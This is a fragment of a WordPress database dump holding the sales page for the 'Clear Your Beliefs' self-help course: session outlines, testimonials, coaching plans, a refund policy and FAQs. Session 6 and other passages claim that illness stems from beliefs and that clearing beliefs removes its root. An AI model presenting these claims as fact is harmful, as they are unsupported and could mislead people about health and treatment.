<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this bonus interview with internationally acclaimed author and teacher Anodea Judith.  Anodea is one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation in their book, <em>Creating On Purpose –</em> a step-by-step manual for turning your dreams into reality.  Beliefs are at the core of the manifestation process.  <em>The BeliefCloset Process</em> was originally developed for their Manifestation Workshop, which they taught in seven countries around the world to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 18:54:53', '2014-06-17 23:54:53', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(975, 2, '2014-06-17 18:45:21', '2014-06-17 23:45:21', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" 